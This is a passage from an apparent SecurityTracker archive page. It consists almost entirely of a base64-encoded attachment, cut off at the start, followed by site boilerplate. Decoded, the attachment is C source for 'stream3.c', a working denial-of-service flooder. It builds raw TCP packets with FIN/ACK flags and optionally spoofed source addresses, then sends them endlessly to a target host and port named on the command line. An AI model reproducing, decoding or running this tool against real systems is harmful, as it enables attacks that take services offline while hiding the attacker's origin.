dHVybihhbnN3ZXIpOwp9Cgp1X2xvbmcgbG9va3VwKGNoYXIgKmhvc3RuYW1lKQp7CiAgICBzdHJ1
Y3QgaG9zdGVudCAqaHA7CgogICAgaWYgKChocCA9IGdldGhvc3RieW5hbWUoaG9zdG5hbWUpKSA9
PSBOVUxMKSB7CiAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkNvdWxkIG5vdCByZXNvbHZlICVzLlxu
IiwgaG9zdG5hbWUpOwogICAgICAgZXhpdCgtMyk7CiAgICB9CgogICAgcmV0dXJuICoodV9sb25n
ICopaHAtPmhfYWRkcjsKfQoKCnZvaWQgZmxvb2Rlcih2b2lkKQp7CiAgICBpbnQgaTsKICAgIHN0
cnVjdCBwYWNrZXQgcGFja2V0OwoJCQkJCS8qIHVzZSBzYW1lIHN0cnVjdHVyZSBhcyBwc2V1ZG8g
cGFja2V0ICovCiAgICBzdHJ1Y3QgY2tzdW0gICogY2tzdW0gPSAoc3RydWN0IGNrc3VtICopKChj
aGFyICopJnBhY2tldCArIHNpemVvZihzdHJ1Y3QgaXBfaGRyKSAtIHNpemVvZihzdHJ1Y3QgcHNl
dWRvX2hkcikpIDsKICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBzX2luOwogICAgCiAgICBtZW1zZXQo
JnBhY2tldCwgMCwgc2l6ZW9mKHBhY2tldCkpOwogICAgCiAgICBpZighc3JjYWRkcilzcmNhZGRy
ID0gcmFuZG9tKCk7CiAgICBpZighc3JjcG9ydClzcmNwb3J0ID0gcmFuZCgpOwoKCiAgICBwYWNr
ZXQudGNwLnRoX3dpbiAgICAgICAgICAgPSBodG9ucygxNjM4NCk7CiAgICBwYWNrZXQudGNwLnRo
X3NlcSAgICAgICAgICAgPSByYW5kb20oKTsKICAgIHBhY2tldC50Y3AudGhfYWNrICAgICAgICAg
ICA9IDA7CiAgICBwYWNrZXQudGNwLnRoX29mZiAgICAgICAgICAgPSA1OwogICAgcGFja2V0LnRj
cC50aF91cnAgICAgICAgICAgID0gMDsKICAgIHBhY2tldC50Y3AudGhfYWNrIAkJPSByYW5kKCk7
CiAgICBwYWNrZXQudGNwLnRoX2ZsYWdzIAk9IFRIX0FDS3xUSF9GSU47CiAgICBwYWNrZXQudGNw
LnRoX3Nwb3J0IAk9IGh0b25zKHNyY3BvcnQpOwogICAgcGFja2V0LnRjcC50aF9kcG9ydCAgICAg
ICAgID0gaHRvbnMoZHN0cG9ydCk7CiAgICBja3N1bS0+cHNldWRvLmRhZGRyICAgICAgICAgID0g
ZHN0YWRkcjsKICAgIGNrc3VtLT5wc2V1ZG8uc2FkZHIJCSA9IHNyY2FkZHI7CiAgICBja3N1bS0+
cHNldWRvLm1ieiAgICAgICAgICAgID0gMDsKICAgIGNrc3VtLT5wc2V1ZG8ucHRjbCAgICAgICAg
ICAgPSBJUFBST1RPX1RDUDsKICAgIGNrc3VtLT5wc2V1ZG8udGNwbCAgICAgICAgICAgPSBodG9u
cyhzaXplb2Yoc3RydWN0IHRjcF9oZHIpKTsKIAogICAgcGFja2V0LnRjcC50aF9zdW0gICAgICAg
ICAgID0gaW5fY2tzdW0oKHZvaWQgKilja3N1bSwgc2l6ZW9mKHN0cnVjdCBja3N1bSkpOwoKICAg
IHBhY2tldC5pcC5pcF9obCAgICAgICAgICAgICA9IDU7CiAgICBwYWNrZXQuaXAuaXBfdiAgICAg
ICAgICAgICAgPSA0OwogICAgcGFja2V0LmlwLmlwX3AgICAgICAgICAgICAgID0gSVBQUk9UT19U
Q1A7CiAgICBwYWNrZXQuaXAuaXBfdG9zICAgICAgICAgICAgPSAweDA4OwogICAgcGFja2V0Lmlw
LmlwX2lkICAgICAgICAgICAgID0gcmFuZCgpOwogICAgcGFja2V0LmlwLmlwX2xlbiAgICAgICAg
ICAgID0gRklYKHNpemVvZihwYWNrZXQpKTsKICAgIHBhY2tldC5pcC5pcF9vZmYgICAgICAgICAg
ICA9IDA7CiAgICBwYWNrZXQuaXAuaXBfdHRsICAgICAgICAgICAgPSAyNTU7CiAgICBwYWNrZXQu
aXAuaXBfZHN0CQk9IGRzdGFkZHI7CiAgICBwYWNrZXQuaXAuaXBfc3JjICAgICAJPSBzcmNhZGRy
OwogICAgcGFja2V0LmlwLmlwX3N1bSAgICAgICAgIAk9IDA7CiAgICBwYWNrZXQuaXAuaXBfc3Vt
ICAgICAgICAgICAgPSBpbl9ja3N1bSgodm9pZCAqKSZwYWNrZXQuaXAsIDIwKTsKCiAgICBzX2lu
LnNpbl9mYW1pbHkgICAgICAgICAgICAgPSBBRl9JTkVUOwogICAgc19pbi5zaW5fcG9ydCAgICAg
ICAgICAgICAgID0gaHRvbnMoZHN0cG9ydCk7CiAgICBzX2luLnNpbl9hZGRyLnNfYWRkcgk9IGRz
dGFkZHI7CiAgICBmb3IoaT0wOzsrK2kpIHsJCQkvKiB3ZSBkbyBub3Qgd2FudCB0byBjaGFuZ2Ug
cGFja2V0IGF0IGFsbCAqLwogICAgICAgaWYgKHNlbmR0byhzb2NrLCAmcGFja2V0LCBzaXplb2Yo
cGFja2V0KSwgMCwgKHN0cnVjdCBzb2NrYWRkciAqKSZzX2luLCBzaXplb2Yoc19pbikpIDwgMCkK
ICAgICAgICAgIHBlcnJvcigic2VuZHRvKCkiKTsKICAgIH0KfQoKaW50IG1haW4oaW50IGFyZ2Ms
IGNoYXIgKmFyZ3ZbXSkKewogICAgaW50IG9uID0gMTsKCiAgICBwcmludGYoInN0cmVhbTMuYyB2
MC4xIC0gRklOL0FDSyBTdG9ybVxuIDNBUEEzQUBzZWN1cml0eS5ubm92LnJ1XG4iKTsKCiAgICBp
ZiAoYXJnYyA8IDEpIGV4aXQoLTMpOwogICAgaWYgKGFyZ2MgPCAzIHx8IGFyZ2MgPiA1KQogICAg
ICAgdXNhZ2UoYXJndlswXSk7CgogICAgc3JhbmQodGltZShOVUxMKSk7IAkJCS8qIHdlIG5lZWRu
J3QgdG9vIG11Y2ggcmFuZG9tbmVzcyAqLwoKICAgIGRzdGFkZHIgICAgID0gbG9va3VwKGFyZ3Zb
MV0pOwogICAgZHN0cG9ydCAgICAgPSBhdG9pKGFyZ3ZbMl0pOwoKICAgIGlmICghZHN0YWRkciB8
fCAhZHN0cG9ydCkgdXNhZ2UoYXJndlswXSk7CgogICAgaWYoYXJnYyA+IDMpIHNyY2FkZHIgPSBs
b29rdXAoYXJndlszXSk7CiAgICBpZihhcmdjID4gNCkgc3JjcG9ydCA9IGF0b2koYXJndls0XSk7
CgogICAgaWYgKChzb2NrID0gc29ja2V0KFBGX0lORVQsIFNPQ0tfUkFXLCBJUFBST1RPX1JBVykp
IDwgMCkgewogICAgICAgcGVycm9yKCJzb2NrZXQoKSIpOwogICAgICAgZXhpdCgtMSk7CiAgICB9
CgogICAgaWYgKHNldHNvY2tvcHQoc29jaywgSVBQUk9UT19JUCwgSVBfSERSSU5DTCwgKGNoYXIg
Kikmb24sIHNpemVvZihvbikpIDwgMCkgewogICAgICAgcGVycm9yKCJzZXRzb2Nrb3B0KCkiKTsK
ICAgICAgIGV4aXQoLTIpOwogICAgfQoKICAgIHByaW50ZigiU3RhcnRpbmciKTsgCiAgICBmZmx1
c2goc3Rkb3V0KTsKCiAgICBmbG9vZGVyKCk7CgogICAgcmV0dXJuIDA7Cn0K

------------A75016D2F7EDAB0--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC